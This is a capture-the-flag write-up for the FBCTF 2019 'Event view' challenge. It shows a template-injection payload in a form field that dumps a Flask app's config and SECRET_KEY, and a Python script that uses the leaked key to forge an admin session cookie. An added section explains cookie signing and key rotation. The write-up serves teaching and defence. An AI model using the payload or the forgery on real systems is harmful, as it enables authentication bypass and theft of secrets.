Problem: [FBCTF 2019] Event view
Approach
- General solution idea
Registering the admin user is not possible, so sign up with an arbitrary username/password, e.g. bigwario/bigwario.
Clicking Admin panel gives the message
You do not seem to be an admin, bigwario!
So the goal is to become admin. Inspecting the cookie:
{'user':'ImJpZ3dhcmlvIg.aNU28g.C-2Qfia0qlJxSoUUY9EDDZSjrSM'}
Decoding it:
python flask_session_cookie_manager3.py decode -c "ImJpZ3dhcmlvIg.aNU28g.C-2Qfia0qlJxSoUUY9EDDZSjrSM" # "bigwario"
Simply constructing a cookie does not work, because the signature has to change as well. Looking through the application's features, the event_important field is vulnerable to SSTI:
POST / HTTP/1.1
Host: node4.anna.nssctf.cn:28214
Content-Length: 89
Cache-Control: max-age=0
Origin: http://node4.anna.nssctf.cn:28214
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-GPC: 1
Accept-Language: zh-CN,zh;q=0.5
Referer: http://node4.anna.nssctf.cn:28214/
Accept-Encoding: gzip, deflate, br
Cookie: user=ImJpZ3dhcmlvIg.aNU28g.C-2Qfia0qlJxSoUUY9EDDZSjrSM; events_sesh_cookie=.eJwlzrsRwjAMANBdVKfQz5adZThZUg7ahFQcu1PwJngfeBxnXU_Y3-ddGzxeCTuYo5syz-BEbzpSgi2mIktIenVbModj6ODJzduojJYVTFOGrsLss4TIE4MyjNsUU1tYzQVHtxzuLhqH1NJsMpKo4zqEUAo2uK86_xmC7w9l0y6H.aNU28g.LkOjw1mcJlEL_ZpbN7kyWFOYmII
Connection: keep-alive

event_name=1&event_address=1&event_important=__class__.__init__.__globals__[app].config
This returns the application config, including the SECRET_KEY:
<Config {'ENV': 'production', 'DEBUG': False, 'TESTING': False, 'PROPAGATE_EXCEPTIONS': None, 'PRESERVE_CONTEXT_ON_EXCEPTION': None, 'SECRET_KEY': 'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y', 'PERMANENT_SESSION_LIFETIME': datetime.timedelta(days=31), 'USE_X_SENDFILE': False, 'SERVER_NAME': None, 'APPLICATION_ROOT': '/', 'SESSION_COOKIE_NAME': 'events_sesh_cookie', 'SESSION_COOKIE_DOMAIN': False, 'SESSION_COOKIE_PATH': None, 'SESSION_COOKIE_HTTPONLY': True, 'SESSION_COOKIE_SECURE': False, 'SESSION_COOKIE_SAMESITE': None, 'SESSION_REFRESH_EACH_REQUEST': True, 'MAX_CONTENT_LENGTH': None, 'SEND_FILE_MAX_AGE_DEFAULT': datetime.timedelta(seconds=43200), 'TRAP_BAD_REQUEST_ERRORS': None, 'TRAP_HTTP_EXCEPTIONS': False, 'EXPLAIN_TEMPLATE_LOADING': False, 'PREFERRED_URL_SCHEME': 'http', 'JSON_AS_ASCII': True, 'JSON_SORT_KEYS': True, 'JSONIFY_PRETTYPRINT_REGULAR': False, 'JSONIFY_MIMETYPE': 'application/json', 'TEMPLATES_AUTO_RELOAD': None, 'MAX_COOKIE_SIZE': 4093, 'SQLALCHEMY_DATABASE_URI': 'sqlite:///my.db', 'SQLALCHEMY_TRACK_MODIFICATIONS': False, 'SQLALCHEMY_BINDS': None, 'SQLALCHEMY_NATIVE_UNICODE': None, 'SQLALCHEMY_ECHO': False, 'SQLALCHEMY_RECORD_QUERIES': None, 'SQLALCHEMY_POOL_SIZE': None, 'SQLALCHEMY_POOL_TIMEOUT': None, 'SQLALCHEMY_POOL_RECYCLE': None, 'SQLALCHEMY_MAX_OVERFLOW': None, 'SQLALCHEMY_COMMIT_ON_TEARDOWN': False, 'SQLALCHEMY_ENGINE_OPTIONS': {}}>
With the key, construct a cookie for admin; clicking Admin panel afterwards yields the flag:
from flask import Flask
from flask.sessions import SecureCookieSessionInterface

app = Flask(__name__)
# SECRET_KEY leaked from app.config via the SSTI payload
app.secret_key = b'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'
# Same serializer Flask uses for its session cookie (salt "cookie-session", HMAC-SHA1)
session_serializer = SecureCookieSessionInterface().get_signing_serializer(app)


@app.route('/')
def index():
    # Sign the value "admin" exactly as the server would have for a real admin login
    print(session_serializer.dumps("admin"))


index()
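As an added example (not from the writeup), a stdlib-only reimplementation of the check Flask performs on such a cookie, to show why the dumped SECRET_KEY is the whole story: the payload and timestamp are plain base64 anyone can read, the only thing binding them to the server is an HMAC-SHA1 under a key derived from SECRET_KEY, and rotating that key invalidates every cookie minted with the old one. It assumes itsdangerous >= 1.0 conventions (Unix timestamp, salt "cookie-session", "hmac" key derivation) and a plain-string session value as in the writeup.

```python
import base64
import hashlib
import hmac
import json
import zlib

# Values taken from the writeup: the captured 'user' cookie and the SECRET_KEY that
# the SSTI payload dumped from app.config. Constants mirror Flask/itsdangerous defaults.
CAPTURED_USER_COOKIE = "ImJpZ3dhcmlvIg.aNU28g.C-2Qfia0qlJxSoUUY9EDDZSjrSM"
LEAKED_SECRET_KEY = b"fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y"
SALT = b"cookie-session"  # SecureCookieSessionInterface.salt

def b64d(s: str) -> bytes:  # unpadded URL-safe base64, as itsdangerous emits it
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def b64e(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()

def derive_key(secret_key: bytes) -> bytes:
    # Flask passes key_derivation="hmac", digest_method=sha1 to itsdangerous,
    # so the signing key is just HMAC-SHA1(secret_key, salt).
    return hmac.new(secret_key, SALT, hashlib.sha1).digest()

def decode_unverified(cookie: str) -> tuple:
    """Payload and issue time are plain base64: readable by anyone, trusted by nobody."""
    signed, _, _sig = cookie.rpartition(".")
    payload_b64, _, ts_b64 = signed.rpartition(".")
    raw = b64d(payload_b64.lstrip("."))
    if payload_b64.startswith("."):  # itsdangerous zlib-compresses long payloads
        raw = zlib.decompress(raw)
    return json.loads(raw), int.from_bytes(b64d(ts_b64), "big")

def server_sign(value, issued_at: int, secret_key: bytes) -> str:
    """What the server does when issuing a session: payload.timestamp.signature."""
    payload = b64e(json.dumps(value, separators=(",", ":")).encode())
    ts = b64e(issued_at.to_bytes((issued_at.bit_length() + 7) // 8, "big"))
    sig = hmac.new(derive_key(secret_key), f"{payload}.{ts}".encode(), hashlib.sha1).digest()
    return f"{payload}.{ts}.{b64e(sig)}"

def verify(cookie: str, secret_key: bytes) -> bool:
    """Server-side check: only this HMAC ties the payload to whoever holds the key."""
    signed, _, sig_b64 = cookie.rpartition(".")
    expected = hmac.new(derive_key(secret_key), signed.encode(), hashlib.sha1).digest()
    return hmac.compare_digest(expected, b64d(sig_b64))

if __name__ == "__main__":
    print(decode_unverified(CAPTURED_USER_COOKIE))          # no key needed to read it
    print(verify(CAPTURED_USER_COOKIE, LEAKED_SECRET_KEY))  # True iff that key signed it
    print(verify(CAPTURED_USER_COOKIE, b"rotated-key"))     # False once the key is rotated
```

The remediation this illustrates is the one the challenge denies its operator: keep SECRET_KEY out of anything user input can reach, and rotate it immediately if it is ever exposed.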
EXP
- Exploit code
Summary
- Key points tested by this challenge

Thankfully there were experts to learn from.